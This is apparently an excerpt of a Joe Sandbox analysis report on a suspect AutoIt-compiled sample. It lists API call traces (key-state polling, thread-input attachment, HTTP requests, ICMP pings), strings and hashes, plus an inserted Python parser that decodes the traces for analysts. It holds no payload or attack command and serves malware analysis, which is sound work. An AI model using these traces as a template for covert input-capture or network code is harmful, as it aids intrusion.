                                                                      • Opcode Fuzzy Hash: 3a05b55f34f6b6fa380294d0487b561e92a88c65491334753eb2e058da46daee
                                                                      • Instruction Fuzzy Hash: A761AC76608311AFDB10DF54C889F6ABBE8FF88711F104819F9859B291D770EE49CB92
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A333CF
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A333F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: b60319b0916a8acf07a1856b7bdae9a1b4d0e02136326cc4dc65dac905a396db
                                                                      • Instruction ID: ba21bea0186e265c72785cde7a695fcc7e83f611c78ed2f4e7cafe6f776f0c64
                                                                      • Opcode Fuzzy Hash: b60319b0916a8acf07a1856b7bdae9a1b4d0e02136326cc4dc65dac905a396db
                                                                      • Instruction Fuzzy Hash: 4C516D32D40209BADF15EBE0DE46FEEB778AF44740F108569B50572092EB356F58CB61
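The per-function API traces on this page (the modifier-key polling record, the ICMP "Ping" record and the LoadStringW record above, among dozens of others) are only useful to an analyst once they are machine-readable, so that argument values can be decoded and compared across functions instead of eyeballed. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the report's call-line format (`• Api.MODULE(args), ref: ADDR`, with the argument list absent for zero-argument calls and a `Part of subcall function` prefix on nested calls) into one record per `APIs` block, decodes the 8-digit hex arguments, and runs two checks on the result: which virtual-key codes a record polls through GetAsyncKeyState/GetKeyState, and whether each IcmpSendEcho call sizes its reply buffer to the documented minimum of sizeof(ICMP_ECHO_REPLY) + RequestSize + 8. The VK name table, the 28-byte 32-bit ICMP_ECHO_REPLY size, the section-header names used as block terminators and the sample text (copied from the three records named above) are my own constructions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: call lines copied from three records on this page (the
# modifier-key polling routine, the ICMP "Ping" routine and LoadStringW with a
# "Part of subcall function" line), exactly as the report prints them.
SAMPLE = """
APIs
• GetKeyboardState.USER32(?), ref: 00A29CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00A29D22
• GetKeyState.USER32(000000A0), ref: 00A29D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00A29D57
• GetKeyState.USER32(000000A1), ref: 00A29D6C
• GetAsyncKeyState.USER32(00000011), ref: 00A29D84
• GetKeyState.USER32(00000011), ref: 00A29D96
• GetAsyncKeyState.USER32(00000012), ref: 00A29DAE
• GetKeyState.USER32(00000012), ref: 00A29DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00A29DD8
• GetKeyState.USER32(0000005B), ref: 00A29DEA
Memory Dump Source
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00A405BC
• inet_addr.WSOCK32(?), ref: 00A4061C
• gethostbyname.WSOCK32(?), ref: 00A40628
• IcmpCreateFile.IPHLPAPI ref: 00A40636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 00A407B9
• WSACleanup.WSOCK32 ref: 00A407BF
Strings
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A333CF
  • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A333F0
Strings
"""

# One call line is "• Api.MODULE(args), ref: ADDR"; the argument list is absent
# for zero-argument calls, and subcall lines are prefixed with the caller address.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
SECTION_END = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class Call:
    api: str
    module: str
    args: list                    # int for 8-digit hex, None for "?", str otherwise
    ref: int
    caller: Optional[int] = None  # set on "Part of subcall function" lines

def decode_arg(tok: str):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if HEX8_RE.match(tok) else tok

def parse_records(text: str) -> list:
    """One list of Call per 'APIs' block; the next section header ends the block."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
        elif line in SECTION_END:
            current = None
        elif current is not None and (m := CALL_RE.match(line)):
            args = [decode_arg(a) for a in m["args"].split(",")] if m["args"] else []
            caller = int(m["caller"], 16) if m["caller"] else None
            current.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), caller))
    return records

# Virtual-key codes (my constants, from winuser.h) for the modifiers polled above.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

def polled_keys(record: list) -> list:
    """Virtual keys the record polls through GetAsyncKeyState/GetKeyState."""
    codes = {c.args[0] for c in record if c.api in ("GetAsyncKeyState", "GetKeyState")
             and c.args and isinstance(c.args[0], int)}
    return sorted(VK_NAMES.get(k, f"VK_0x{k:02X}") for k in codes)

ICMP_ECHO_REPLY_SIZE = 28  # sizeof(ICMP_ECHO_REPLY) in a 32-bit process (assumed here)

def icmp_echo_params(record: list) -> list:
    """RequestSize, ReplySize and Timeout of each IcmpSendEcho call, plus the
    documented check ReplySize >= sizeof(ICMP_ECHO_REPLY) + RequestSize + 8."""
    out = []
    for c in record:
        if c.api == "IcmpSendEcho" and len(c.args) == 8:
            req, reply, timeout = c.args[3], c.args[6], c.args[7]
            ok = isinstance(req, int) and isinstance(reply, int) and reply >= ICMP_ECHO_REPLY_SIZE + req + 8
            out.append({"request_size": req, "reply_size": reply, "timeout_ms": timeout, "reply_buffer_ok": ok})
    return out

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, sorted({c.api for c in rec}), polled_keys(rec), icmp_echo_params(rec))
```

Run against the three records it reports, for the first, VK_CONTROL, VK_LSHIFT, VK_LWIN, VK_MENU and VK_RSHIFT: five modifier codes only, which records modifier state and not typed characters, so on its own this routine is not keystroke capture (a keylogger would sweep the whole key range). For the second it decodes each IcmpSendEcho as a 5-byte request, a 0x29 = 41-byte reply buffer and a 0xFA0 = 4000 ms timeout; 41 is exactly 28 + 5 + 8, so the buffer meets the documented minimum. The same parser can be pointed at the full report text to diff API sets between functions or between samples.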
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 4ead0f05c26552516beee98527644e3dddc3f4de9d47b8f46968ae2f44ada3b4
                                                                      • Instruction ID: 46c1c9c884d373bcdcf3cb40374bfdd291e83e4672a6a43a76fbbd1da6c5ac51
                                                                      • Opcode Fuzzy Hash: 4ead0f05c26552516beee98527644e3dddc3f4de9d47b8f46968ae2f44ada3b4
                                                                      • Instruction Fuzzy Hash: 9D41B632A111379BCB206F7D9C905BE77B5BFA0B94B244539E462DB284E735CD81C7A0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A353A0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A35416
                                                                      • GetLastError.KERNEL32 ref: 00A35420
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00A354A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 49722581a54e62b998974119564c751df4237b646541218a1d241b8bbb6b08e0
                                                                      • Instruction ID: 04240408bdc60675215ff405ce279f1ecdc8c625705f0380657f9d3416175fdd
                                                                      • Opcode Fuzzy Hash: 49722581a54e62b998974119564c751df4237b646541218a1d241b8bbb6b08e0
                                                                      • Instruction Fuzzy Hash: 7F318935E006049FD718EF6CC884BAABBB5FF44305F148069F8068B2A2DB31DD82CB91
                                                                      APIs
                                                                      • CreateMenu.USER32 ref: 00A53C79
                                                                      • SetMenu.USER32(?,00000000), ref: 00A53C88
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A53D10
                                                                      • IsMenu.USER32(?), ref: 00A53D24
                                                                      • CreatePopupMenu.USER32 ref: 00A53D2E
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A53D5B
                                                                      • DrawMenuBar.USER32 ref: 00A53D63
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID: 0$F
                                                                      • API String ID: 161812096-3044882817
                                                                      • Opcode ID: dd332463ce5fbf6d6771435325e064225c671b7954f3b491acdbd2c70d90db56
                                                                      • Instruction ID: 685daa3a907af66e306d3af82fb65fa458535ce5e18ceb9dd864fa5a495cce0d
                                                                      • Opcode Fuzzy Hash: dd332463ce5fbf6d6771435325e064225c671b7954f3b491acdbd2c70d90db56
                                                                      • Instruction Fuzzy Hash: 80415676A01309AFDF14CFA4D884BAA7BB5FF89391F140429ED46A7360D730AA15CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A53A9D
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A53AA0
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A53AC7
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A53AEA
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A53B62
                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A53BAC
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A53BC7
                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A53BE2
                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A53BF6
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A53C13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: fe82c94943c949cc1c27eaf8f6c07b422911fe9be4218e809d8b783c7d38fee3
                                                                      • Instruction ID: efff284dba8c88168c84f0f4a9c49356ee50787f2ba08ac695f2c7cfb00af348
                                                                      • Opcode Fuzzy Hash: fe82c94943c949cc1c27eaf8f6c07b422911fe9be4218e809d8b783c7d38fee3
                                                                      • Instruction Fuzzy Hash: 01616C75A00248AFDB11DFA8CC81EEE77B8FB49710F10419AFA15E7291C774AE49DB50
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A2B151
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B165
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00A2B16C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B17B
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A2B18D
                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1B8
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B1FD
                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B212
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A2A1E1,?,00000001), ref: 00A2B21D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 05adbb51ab8344e0cb604bf94cf934eb17b2e3bb0c36babfe7e236ce677a019e
                                                                      • Instruction ID: 8062cafe65b66a0e9f64780ac72f558c77f9f18d415a8c6ce2694c8996e3f3a0
                                                                      • Opcode Fuzzy Hash: 05adbb51ab8344e0cb604bf94cf934eb17b2e3bb0c36babfe7e236ce677a019e
                                                                      • Instruction Fuzzy Hash: D0317F72620314EFDB10DFA8EC44BAE7BB9BB51322F104125FA05D61A1DBB49A42CB70
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009F2C94
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009F2CA0
                                                                      • _free.LIBCMT ref: 009F2CAB
                                                                      • _free.LIBCMT ref: 009F2CB6
                                                                      • _free.LIBCMT ref: 009F2CC1
                                                                      • _free.LIBCMT ref: 009F2CCC
                                                                      • _free.LIBCMT ref: 009F2CD7
                                                                      • _free.LIBCMT ref: 009F2CE2
                                                                      • _free.LIBCMT ref: 009F2CED
                                                                      • _free.LIBCMT ref: 009F2CFB
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 7098d777ad2dcf9e01eabea6d5be60adc47228819ebe3932f22528762ad55077
                                                                      • Instruction ID: f18dabf9773c837c5f498eb9640a99ff93b51a3ca78c7f45fa91dedbc2f84536
                                                                      • Opcode Fuzzy Hash: 7098d777ad2dcf9e01eabea6d5be60adc47228819ebe3932f22528762ad55077
                                                                      • Instruction Fuzzy Hash: 5511B97614010DBFCB02EF54D942EED3BA5FF45350F5144A5FA485F222D671EE909B90
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009C1459
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 009C14F8
                                                                      • UnregisterHotKey.USER32(?), ref: 009C16DD
                                                                      • DestroyWindow.USER32(?), ref: 00A024B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00A0251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A0254B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 4c1ae39a303ec8dfbcaadd9d4c3c4b0c9900bc236eb85eb3234c73b03a54db8e
                                                                      • Instruction ID: 5d1e7840eb4240213c6f89b4bf5d3e9225d7c50f6209b6974d8739cc19d4aba9
                                                                      • Opcode Fuzzy Hash: 4c1ae39a303ec8dfbcaadd9d4c3c4b0c9900bc236eb85eb3234c73b03a54db8e
                                                                      • Instruction Fuzzy Hash: C9D17931B012128FCB19EF14D999F29F7A4BF45710F1442ADE84A6B2A2CB31AD12CF59
                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A37FAD
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A37FC1
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A37FEB
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A38005
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38017
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38060
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A380B0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                      • String ID: *.*
                                                                      • API String ID: 769691225-438819550
                                                                      • Opcode ID: c99522fb81ca215728e80c788bd38e599d86f5f0d038a5dd2372169a1198cd6c
                                                                      • Instruction ID: 1cd60bbb6f589dbf2b75bda43ff4d9eadd1acbd67181b40387ef3bed7579f4fc
                                                                      • Opcode Fuzzy Hash: c99522fb81ca215728e80c788bd38e599d86f5f0d038a5dd2372169a1198cd6c
                                                                      • Instruction Fuzzy Hash: FD818DB25083459FCB24EF54C885AAEB3E8BF89310F64486EF885D7251EB34DD498B52
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 009C5C7A
                                                                        • Part of subcall function 009C5D0A: GetClientRect.USER32(?,?), ref: 009C5D30
                                                                        • Part of subcall function 009C5D0A: GetWindowRect.USER32(?,?), ref: 009C5D71
                                                                        • Part of subcall function 009C5D0A: ScreenToClient.USER32(?,?), ref: 009C5D99
                                                                      • GetDC.USER32 ref: 00A046F5
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A04708
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A04716
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00A0472B
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00A04733
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A047C4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: ec46d368ad7d47d1aa0cf0495153ee9d34e5fb9d6b9cb4f5d057b66f355ad337
                                                                      • Instruction ID: 89d53a4b71033b593fbd07978b82893c46c937217923639438c3ae5c60378a48
                                                                      • Opcode Fuzzy Hash: ec46d368ad7d47d1aa0cf0495153ee9d34e5fb9d6b9cb4f5d057b66f355ad337
                                                                      • Instruction Fuzzy Hash: BB71F070900209DFCF21CF64D984ABA3BB5FF4A360F144269EE515A2A6D7319C81DF60
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00A335E4
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • LoadStringW.USER32(00A92390,?,00000FFF,?), ref: 00A3360A
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: cb8ee31e721f0caf9d2c7c81b21a8f3de2c80dfe76a4b45bc826b5050b98f37b
                                                                      • Instruction ID: 3dfe3cee3e3a7a9a5cd1f29dba94d9a6a3a12c67675f44bb9b5e8b2f353ee087
                                                                      • Opcode Fuzzy Hash: cb8ee31e721f0caf9d2c7c81b21a8f3de2c80dfe76a4b45bc826b5050b98f37b
                                                                      • Instruction Fuzzy Hash: 1B516B72D0020ABBDF14EBE0DD46FEEBB38AF44340F148129F105721A1EB305A99DBA1
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                        • Part of subcall function 009D912D: GetCursorPos.USER32(?), ref: 009D9141
                                                                        • Part of subcall function 009D912D: ScreenToClient.USER32(00000000,?), ref: 009D915E
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000001), ref: 009D9183
                                                                        • Part of subcall function 009D912D: GetAsyncKeyState.USER32(00000002), ref: 009D919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A58B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00A58B71
                                                                      • ReleaseCapture.USER32 ref: 00A58B77
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00A58C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A58C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A58CFF
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      • Opcode ID: 16f1e6e68f5fab90240cceb062cc0404a2c8983e5d8a487b3ee05daca300662e
                                                                      • Instruction ID: a2c9fbf947e658a5cebf53b8c841ca9662481e16fc0d193529782218c54f2675
                                                                      • Opcode Fuzzy Hash: 16f1e6e68f5fab90240cceb062cc0404a2c8983e5d8a487b3ee05daca300662e
                                                                      • Instruction Fuzzy Hash: 7051AC70604300AFD700EF60CC9AFAA77E4FB88715F000A2DF996672E1DB749909CB62
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A3C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A3C29A
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A3C2CA
                                                                      • GetLastError.KERNEL32 ref: 00A3C322
                                                                      • SetEvent.KERNEL32(?), ref: 00A3C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00A3C341
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 7a2a062f4e718716671884571721ab220e7a0bdab03ab8e2ab6a5641fdfd0854
                                                                      • Instruction ID: 21ecadc133153b52e691adc6900676ab8025897685610b8533b1ac23a9c95c85
                                                                      • Opcode Fuzzy Hash: 7a2a062f4e718716671884571721ab220e7a0bdab03ab8e2ab6a5641fdfd0854
                                                                      • Instruction Fuzzy Hash: 75316BB1600308AFD721EFA49D88AABBBFCFB49764F14851EF446A7200DB34DD059B61
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A03AAF,?,?,Bad directive syntax error,00A5CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A298BC
                                                                      • LoadStringW.USER32(00000000,?,00A03AAF,?), ref: 00A298C3
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A29987
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 858772685-4153970271
                                                                      • Opcode ID: 966c63b272de24310b2bee11d5baf98afc3720af0e71edae6b1178f0630d0f7c
                                                                      • Instruction ID: db61908732acc9cc4f730683d0c0c6a4630617381dba5477b2fb1f28e4d20457
                                                                      • Opcode Fuzzy Hash: 966c63b272de24310b2bee11d5baf98afc3720af0e71edae6b1178f0630d0f7c
                                                                      • Instruction Fuzzy Hash: 9B216B31D4021ABBDF11AF90DC0AFEE7739FF18700F04882AF519660A2EA319658DB11
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00A220AB
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00A220C0
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A2214D
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1290815626-3381328864
                                                                      • Opcode ID: 2f092f4716b4a770c6d576b728d5725853ceca18ee8d1e5c188baf3d5cddc1ef
                                                                      • Instruction ID: 40fa0dd4af0c8073c0c5e5fa2c6dfd83c2841f6b881b820a0f00748c51c4b145
                                                                      • Opcode Fuzzy Hash: 2f092f4716b4a770c6d576b728d5725853ceca18ee8d1e5c188baf3d5cddc1ef
                                                                      • Instruction Fuzzy Hash: 9211E77AA88716B9F6017665EC0AEE637ACEF14334B200236FB04A50D1FE655D225718
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
